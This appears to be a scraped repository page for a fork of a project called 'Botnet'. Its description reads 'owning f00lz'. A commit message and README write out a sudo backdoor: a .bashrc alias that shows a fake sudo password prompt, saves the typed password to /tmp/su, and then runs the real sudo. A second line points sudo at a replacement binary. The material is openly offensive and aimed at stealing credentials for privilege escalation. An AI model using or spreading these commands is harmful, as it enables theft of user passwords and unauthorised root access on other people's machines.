3
0
forked from ff/Botnet
Morrigan fa81bedd90 Sudo backdoor script.
'echo 'alias sudo="/somewhere/in/the/filesystem/sudo"' >> ~/.bashrc'  to implement. Not tested yet.
2019-03-24 01:01:51 -07:00
2019-03-24 01:01:51 -07:00
2019-03-23 23:49:20 -07:00
2019-03-23 21:27:14 -07:00

Impliment .bashrc sudo backdoor for priv esc.

'alias sudo='echo -n "[sudo] password for $USER: " && read -r password && echo "$password" >/tmp/su && /usr/bin/sudo $@' >> .bashrc' <--- kinda jenky. will be noticed by anyone paying attention.

Description
learning go. owning f00lz
Readme 57 KiB
Languages
Shell 63.2%
Go 36.8%